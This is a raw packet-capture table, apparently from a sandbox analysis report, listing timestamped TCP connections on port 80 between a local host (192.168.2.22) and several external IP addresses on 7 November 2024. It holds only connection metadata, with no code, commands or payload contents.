                                                                                                                            Nov 7, 2024 10:50:15.477514982 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.477525949 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.477536917 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.477554083 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.477566004 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.477595091 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.477607012 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.477632999 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.477682114 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.520462990 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.520533085 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.520544052 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.520555019 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.520555019 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.520575047 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.520586014 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.551758051 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.551810026 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.551811934 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.551822901 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.551841974 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.551860094 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600099087 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600142956 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600155115 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600161076 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600172997 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600181103 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600192070 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600281000 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600332022 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600342035 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600393057 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600414038 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600423098 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600426912 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600435019 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600469112 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600508928 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600661993 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600673914 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600686073 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600697994 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600701094 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600713015 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600728035 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600778103 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600811958 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600846052 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600860119 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600868940 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600872993 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600884914 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600889921 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600908995 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600934982 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600946903 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600958109 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600964069 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.600970030 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.600995064 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.601021051 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.601193905 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.601206064 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.601217031 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.601239920 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.601255894 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.644162893 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.644177914 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.644190073 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.644254923 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.644452095 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.675410986 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.675431013 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.675445080 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.675477982 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.675494909 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723444939 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723459959 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723472118 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723491907 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723504066 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723522902 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723531008 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723536968 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723547935 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723558903 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723573923 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723649025 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723684072 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723697901 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723709106 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723727942 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723730087 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723742008 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.723747969 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723762989 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723777056 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.723798990 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:15.724555016 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:15.724653006 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:50:23.169816971 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:23.174751997 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.174839020 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:23.189984083 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:23.418184996 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.418196917 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.418241978 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:23.426307917 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.887725115 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.889235020 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.889306068 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:23.938357115 CET804916338.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:23.938410997 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:24.699580908 CET4916380192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:25.716651917 CET4916480192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:25.725110054 CET804916438.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:25.725167036 CET4916480192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:25.735951900 CET4916480192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:25.742552042 CET804916438.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:26.437747002 CET804916438.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:26.438641071 CET804916438.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:26.438847065 CET4916480192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:26.492413998 CET804916438.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:26.492636919 CET4916480192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:27.244447947 CET4916480192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:28.259371042 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:28.264368057 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.264445066 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:28.275607109 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:28.280658960 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.280725956 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:28.280766010 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.285614967 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.285689116 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.966834068 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.966856003 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:28.966922998 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:29.018090963 CET804916538.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:29.018250942 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:29.785223007 CET4916580192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:30.802517891 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:30.807566881 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:30.807635069 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:30.815200090 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:30.820328951 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:31.693883896 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:31.693917990 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:31.694031000 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:31.694046974 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:31.694050074 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:31.694092989 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:31.694092989 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:31.696962118 CET4916680192.168.2.2238.88.82.56
                                                                                                                            Nov 7, 2024 10:50:31.702578068 CET804916638.88.82.56192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:36.714900970 CET4916780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:36.720072985 CET804916715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:36.720153093 CET4916780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:36.732366085 CET4916780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:36.737287998 CET804916715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:36.737299919 CET804916715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:36.737348080 CET4916780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:36.742312908 CET804916715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:37.377024889 CET804916715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:37.377144098 CET4916780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:38.240595102 CET4916780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:38.245441914 CET804916715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:39.257761002 CET4916880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:39.263801098 CET804916815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:39.263885975 CET4916880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:39.275105000 CET4916880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:39.280028105 CET804916815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:39.900291920 CET804916815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:39.900365114 CET4916880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:40.783411980 CET4916880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:40.788247108 CET804916815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:41.800906897 CET4916980192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:41.805871964 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:41.805974960 CET4916980192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:41.817393064 CET4916980192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:41.822374105 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:41.822400093 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:41.822474957 CET4916980192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:41.827294111 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:41.827395916 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:42.423675060 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:42.423768997 CET4916980192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:43.326034069 CET4916980192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:43.331512928 CET804916915.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:44.344960928 CET4917080192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:44.351521969 CET804917015.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:44.351619005 CET4917080192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:44.360196114 CET4917080192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:44.371540070 CET804917015.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:44.980684996 CET804917015.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:44.981004000 CET804917015.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:44.981050014 CET4917080192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:44.983838081 CET4917080192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:50:44.988792896 CET804917015.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.014950991 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:50.022315025 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.022506952 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:50.041954994 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:50.049552917 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.049566031 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.049612045 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:50.056380033 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.922560930 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.922580004 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.922591925 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.922602892 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:50.922700882 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:51.071341038 CET8049171194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:51.071471930 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:51.547287941 CET4917180192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:52.565416098 CET4917280192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:52.570537090 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:52.570641994 CET4917280192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:52.585923910 CET4917280192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:52.590953112 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:53.461095095 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:53.461122990 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:53.461134911 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:53.461173058 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:53.461199045 CET4917280192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:53.610300064 CET8049172194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:53.610361099 CET4917280192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:54.090059996 CET4917280192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:55.112843990 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:55.117830992 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:55.117923021 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:55.128864050 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:55.133958101 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:55.134139061 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:55.134155989 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:55.139240026 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:55.139683962 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:56.010493994 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:56.010521889 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:56.010534048 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:56.010663986 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:56.161416054 CET8049173194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:56.161636114 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:56.633023024 CET4917380192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:57.654131889 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:57.659097910 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:57.659174919 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:57.667145967 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:57.672084093 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540420055 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540811062 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540837049 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540878057 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540889025 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540900946 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.540910006 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:58.540935993 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:58.541099072 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.541110992 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.541122913 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.541138887 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:58.541220903 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:58.689763069 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:50:58.689893007 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:58.690763950 CET4917480192.168.2.22194.58.112.174
                                                                                                                            Nov 7, 2024 10:50:58.695924997 CET8049174194.58.112.174192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:00.100586891 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:51:00.106151104 CET804916245.33.6.223192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:00.106204987 CET4916280192.168.2.2245.33.6.223
                                                                                                                            Nov 7, 2024 10:51:03.938695908 CET4917580192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:03.943542004 CET804917515.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:03.943587065 CET4917580192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:03.955749035 CET4917580192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:03.960664034 CET804917515.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:03.960695982 CET804917515.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:03.960720062 CET4917580192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:03.965583086 CET804917515.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:04.577043056 CET804917515.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:04.577152967 CET4917580192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:05.462605000 CET4917580192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:05.467586040 CET804917515.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:06.479989052 CET4917680192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:06.484930992 CET804917615.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:06.490210056 CET4917680192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:06.498207092 CET4917680192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:06.503392935 CET804917615.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:07.117810965 CET804917615.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:07.118251085 CET4917680192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:08.005332947 CET4917680192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:08.010143995 CET804917615.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.022723913 CET4917780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:09.027643919 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.030209064 CET4917780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:09.040909052 CET4917780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:09.045783043 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.045856953 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.046020031 CET4917780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:09.051110029 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.051120996 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.646953106 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:09.647008896 CET4917780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:10.548336029 CET4917780192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:10.553314924 CET804917715.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:11.595999002 CET4917880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:11.601182938 CET804917815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:11.601275921 CET4917880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:11.647349119 CET4917880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:11.652486086 CET804917815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:12.235718966 CET804917815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:12.236434937 CET804917815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:12.236531973 CET4917880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:12.238708019 CET4917880192.168.2.2215.197.148.33
                                                                                                                            Nov 7, 2024 10:51:12.243509054 CET804917815.197.148.33192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:17.557225943 CET4917980192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:17.562117100 CET8049179104.21.14.183192.168.2.22
